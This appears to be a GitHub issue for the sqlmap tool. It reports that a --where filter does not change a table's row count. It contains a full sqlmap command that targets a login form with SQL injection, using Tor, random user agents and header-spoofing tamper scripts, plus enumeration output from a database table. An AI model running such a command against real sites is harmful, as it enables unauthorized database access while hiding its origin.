-
-
Notifications
You must be signed in to change notification settings - Fork 6.2k
Closed
Labels
Milestone
Description
python2 sqlmap.py -v 2 -o --level 5 --threads 10 --tor --risk 1 --sqlmap-shell --random-agent --drop-set-cookie --tamper xforwardedfor,varnish -u "http://test.test.com.us/login.php" --data "user=&pass=&submit=%BDT%BB%7B"
--count -D test -T detail
Database: test
+------------+---------+
| Table | Entries |
+------------+---------+
| dbo.detail | 92177 |
+------------+---------+
--count -D test -T detail --where "id='test'"
Database: test
+------------+---------+
| Table | Entries |
+------------+---------+
| dbo.detail | 92177 |
+------------+---------+